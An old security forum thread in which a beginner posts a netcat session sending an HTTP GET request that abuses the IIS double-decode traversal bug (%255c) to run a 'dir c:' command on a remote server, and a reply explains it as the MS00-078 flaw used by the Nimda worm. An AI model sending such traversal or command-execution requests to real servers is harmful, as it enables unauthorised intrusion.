-
May 1st, 2006, 04:19 AM
#1
Junior Member
hey guys, i'm a noob and i'm confused about this command script written as a netcat command script. can someone translate this script?? i mean what each part is for.
for example, the script is:
C:TMP/NC/nc -v -n ristbook 80
ristbook [128.1.71.103] 80 http (open)
get http://ristbook/scripts/..%255c../wi....exe?/c+dir+c:
I understand that netcat is logged in to ristbook port 80, but what does the command script mean?? (after ristbook [128.1.71.103] 80 http (open))
-
May 1st, 2006, 08:17 AM
#2
Hi, and welcome to AO.
I have created a new thread for you, as you have a new question
-
May 1st, 2006, 09:54 AM
#3
Originally posted here by noob_hacker
C:TMP/NC/nc -v -n ristbook 80
ristbook [128.1.71.103] 80 http (open)
get http://ristbook/scripts/..%255c../wi....exe?/c+dir+c:
I understand that netcat is logged in to ristbook port 80, but what does the command script mean?? (after ristbook [128.1.71.103] 80 http (open))
You're using the HTTP protocol (GET) to abuse the double decode bug in IIS. It's the same bug Nimda tries to abuse.. It's about 6 years old.. Shouldn't work anymore...
RFC 2616 HTTP 1.1
Aggressive Propagation of Nimda Worm
MS00-078
Oliver's Law:
Experience is something you don't get until just after you need it.
-
May 3rd, 2006, 01:25 PM
#4
Junior Member
uh... can't grasp anything for a layman like me... so by using the command *get* then http means i activated a bug (?) that gives me information about the structure of the http i'm looking at?? cool...
oh ya btw can you give me some more info about what other command i can give on an http port?
-
May 3rd, 2006, 01:44 PM
#5
Originally posted here by noob_hacker
uh... can't grasp anything for a layman like me...
Then why are you trying to exploit something? Learn the basics first..
so by using the command *get* then http means i activated a bug (?) that gives me information about the structure of the http i'm looking at?? cool...
Not quite my friend... You're GETting something from a webserver.. The bug (MS00-078) is in the way IIS handles the %255c.. Which results in an ability to break out of the webroot..
oh ya btw can you give me some more info about what other command i can give on an http port?
Read RFC-2616...
Oliver's Law:
Experience is something you don't get until just after you need it.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|